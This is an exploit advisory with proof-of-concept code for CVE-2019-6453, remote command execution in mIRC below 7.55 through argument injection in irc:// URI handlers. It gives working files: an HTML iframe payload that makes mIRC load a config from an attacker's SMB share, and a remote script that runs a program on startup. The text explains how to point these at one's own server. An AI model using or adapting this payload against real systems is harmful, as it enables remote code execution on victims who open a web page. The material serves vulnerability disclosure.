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mIRC Remote Command Execution

mIRC Remote Command Execution
Posted Feb 18, 2019
Authored by Baptiste Devigne, Benjamin Chetioui

mIRC versions prior to 7.55 suffer from a remote command execution using argument injection through custom URI protocol handlers.

tags | exploit, remote, protocol
advisories | CVE-2019-6453
SHA-256 | 6f1c40c614535f927e40939d24ffe9b2e0da77480bb7fc7d0d3e5f38d8b8cf45

mIRC Remote Command Execution

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# Exploit Title: RCE on mIRC <7.55 using argument injection through custom URI protocol handlers
# Date: 18/02/2019
# Exploit Author: https://twitter.com/proofofcalc/
# Vendor Homepage: https://www.mirc.com
# Software Link: https://www.mirc.com/get.php
# Version: < 7.55
# Tested on: Windows
# CVE : CVE-2019-6453

RCE through URI protocol handlers on mIRC <7.55 (CVE-2019-6453)
===============================================================

Severity: High

mIRC has been shown to be vulnerable to argument injection through its
associated URI protocol handlers that improperly escape their parameters.
Usingavailable command-line parameters, an attacker is able to load a remote
configuration file and to automatically run arbitrary code.

Because mIRC doesn't use any kind of sigil such as -- to mark
the end of the argument list, an attacker is able to pass arguments to mIRC
through a irc:// link and execute arbitrary code by loading a custom
mirc.ini
from an attacker-controlled Samba file server. Please note that ircs://
works
the same way.


PoC
===

The proof of calc requires three files: mirc.ini, calc.ini and poc.html.
We assume a Samba file server is running on the attacker's side. For the
sake of the example, the following pieces of code assume it is running on
host 127.0.0.1 (i.e. replace 127.0.0.1 by your own server's address in
the following files to try this out).

mirc.ini
========

mirc.ini is a custom configuration file that should be located at
C:\mirc-poc\mirc.ini
on the file server.

[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini
========

calc.ini is a remote script file that should be located at
C:\mirc-poc\calc.ini on the
file server.

[script]
n0=on *:START: {
n1= /run calc.exe
n2=}

poc.html
========

Just visiting poc.html should work assuming mIRC is set as the default
handler for the
irc:// URI scheme and the browser does not encode the payload. Depending
on the browser
and your configuration, you might still get a prompt (not the case on
Firefox).

<iframe src='irc://? -i\\127.0.0.1\C$\mirc-poc\mirc.ini' />

Affected versions
=================

This PoC runs for mIRC <7.55.

You can trigger the PoC on Edge 42.17134 (last preview version) and
Firefox 64.0.2
(last release). It doesn't work on Chrome because the way Chrome handle
URI protocols
(URI is encoded before being passed to the application).

References
==========

Further explanation (including proof of concept code):

Write-up:
https://proofofcalc.com/cve-2019-6453-mIRC/

PoC:
https://github.com/proofofcalc/cve-2019-6453-poc

mIRC changelog:
https://www.mirc.com/whatsnew.txt

Authors
=======

Baptiste Devigne (Geluchat) and Benjamin Chetioui (SIben)
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